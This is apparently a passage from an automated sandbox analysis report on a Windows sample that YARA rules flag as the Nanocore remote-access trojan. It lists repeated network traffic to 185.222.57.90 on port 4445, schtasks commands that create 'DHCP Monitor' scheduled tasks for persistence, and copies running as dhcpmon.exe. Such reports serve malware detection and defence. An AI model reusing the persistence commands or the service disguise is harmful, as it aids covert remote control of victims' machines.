              Oct 27, 2021 12:37:01.454898119 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.455085993 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:01.523894072 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.523988008 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:01.595216990 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.618084908 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:01.695794106 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.695868969 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:01.765095949 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.765168905 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:01.835455894 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.868845940 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:01.868943930 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.891315937 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.891416073 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:01.913795948 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.914079905 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:01.937278032 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.937398911 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:01.959980011 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:01.960066080 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:02.032744884 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:02.074086905 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:02.145065069 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:02.196145058 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:02.269045115 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:02.269186020 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:02.350203037 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:02.368557930 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:02.440922022 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:02.524509907 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:02.594212055 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:02.602612019 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:02.676208019 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:02.727931976 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:02.807245970 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:02.868443966 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:02.946063995 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:02.949533939 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:03.025913000 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:03.072199106 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:03.148015976 CEST444549836185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:03.196351051 CEST498364445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.213038921 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.235552073 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.235682011 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.236454964 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.273765087 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.274844885 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.298608065 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.321655989 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.392098904 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.446692944 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.522795916 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.522907972 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.591533899 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.620014906 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.699728966 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.729798079 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.730756998 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.753134966 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.774856091 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.841222048 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.841373920 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:07.911694050 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:07.994235039 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.007854939 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.016727924 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.016938925 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.017056942 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.039738894 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.039940119 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.062586069 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.118289948 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.118869066 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.194924116 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.195110083 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.266222954 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.322190046 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.397002935 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.397224903 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.468267918 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.540616035 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.613817930 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.619162083 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.694896936 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.712726116 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.786688089 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.868773937 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:08.943389893 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:08.943640947 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:09.018460035 CEST444549841185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:09.087657928 CEST498414445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.105899096 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.128462076 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.128632069 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.129561901 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.164612055 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.165051937 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.187777042 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.227979898 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.228517056 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.310857058 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.310940981 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.390178919 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.392472982 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.461466074 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.461570978 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.532744884 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.557009935 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.560168028 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.582500935 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.582866907 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.653810024 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.654877901 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.677941084 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.697480917 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.720019102 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.760319948 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.835509062 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:13.869649887 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:13.946789026 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:14.025749922 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:14.099400043 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:14.099703074 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:14.180811882 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:14.228997946 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:14.305794001 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:14.306004047 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:14.378397942 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:14.400986910 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:14.478586912 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:14.526284933 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:14.599184036 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:14.619457006 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:14.700731993 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:14.775722980 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:14.852302074 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:14.854094982 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:14.923517942 CEST444549842185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:14.979444981 CEST498424445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:18.995290995 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:19.017841101 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:19.017992020 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:19.018469095 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:19.041318893 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:19.087867022 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:19.110349894 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:19.110687971 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:19.134401083 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:19.135448933 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:19.206630945 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:19.290513992 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:19.291003942 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:19.313468933 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:19.369147062 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:19.391527891 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:19.391845942 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:19.414802074 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:19.414906979 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:19.437598944 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:19.478554964 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:21.729439020 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:21.775719881 CEST498434445192.168.2.7185.222.57.90
              Oct 27, 2021 12:37:24.043011904 CEST444549843185.222.57.90192.168.2.7
              Oct 27, 2021 12:37:24.088340998 CEST498434445192.168.2.7185.222.57.90

              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: RHK098760045678009000.exe PID: 1744 Parent PID: 6048

              General

              Start time:12:35:11
              Start date:27/10/2021
              Path:C:\Users\user\Desktop\RHK098760045678009000.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\RHK098760045678009000.exe'
              Imagebase:0x400000
              File size:446374 bytes
              MD5 hash:8AE8A20159A1FDEDD8C4937E8CC4C571
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Analysis Process: RHK098760045678009000.exe PID: 4364 Parent PID: 1744

              General

              Start time:12:35:12
              Start date:27/10/2021
              Path:C:\Users\user\Desktop\RHK098760045678009000.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\RHK098760045678009000.exe'
              Imagebase:0x400000
              File size:446374 bytes
              MD5 hash:8AE8A20159A1FDEDD8C4937E8CC4C571
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:low

              Chronological Activities

              Analysis Process: schtasks.exe PID: 2724 Parent PID: 4364

              General

              Start time:12:35:19
              Start date:27/10/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpBEAC.tmp'
              Imagebase:0x10b0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 2188 Parent PID: 2724

              General

              Start time:12:35:20
              Start date:27/10/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff774ee0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: RHK098760045678009000.exe PID: 5820 Parent PID: 1104

              General

              Start time:12:35:20
              Start date:27/10/2021
              Path:C:\Users\user\Desktop\RHK098760045678009000.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\RHK098760045678009000.exe 0
              Imagebase:0x11a0000
              File size:446374 bytes
              MD5 hash:8AE8A20159A1FDEDD8C4937E8CC4C571
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Analysis Process: schtasks.exe PID: 5728 Parent PID: 4364

              General

              Start time:12:35:20
              Start date:27/10/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpC322.tmp'
              Imagebase:0x10b0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 1388 Parent PID: 5728

              General

              Start time:12:35:21
              Start date:27/10/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff774ee0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: RHK098760045678009000.exe PID: 2184 Parent PID: 5820

              General

              Start time:12:35:22
              Start date:27/10/2021
              Path:C:\Users\user\Desktop\RHK098760045678009000.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\RHK098760045678009000.exe 0
              Imagebase:0x400000
              File size:446374 bytes
              MD5 hash:8AE8A20159A1FDEDD8C4937E8CC4C571
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.306617686.0000000002A3E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Analysis Process: dhcpmon.exe PID: 2724 Parent PID: 1104

              General

              Start time:12:35:23
              Start date:27/10/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
              Imagebase:0x400000
              File size:446374 bytes
              MD5 hash:8AE8A20159A1FDEDD8C4937E8CC4C571
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 30%, ReversingLabs
              Reputation:low

              Chronological Activities

              Analysis Process: dhcpmon.exe PID: 6216 Parent PID: 2724

              General

              Start time:12:35:25
              Start date:27/10/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
              Imagebase:0x400000
              File size:446374 bytes
              MD5 hash:8AE8A20159A1FDEDD8C4937E8CC4C571
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.314285351.00000000028DE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Analysis Process: dhcpmon.exe PID: 6692 Parent PID: 3292

              General

              Start time:12:35:33
              Start date:27/10/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
              Imagebase:0x400000
              File size:446374 bytes
              MD5 hash:8AE8A20159A1FDEDD8C4937E8CC4C571
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Analysis Process: dhcpmon.exe PID: 6812 Parent PID: 6692

              General

              Start time:12:35:34
              Start date:27/10/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
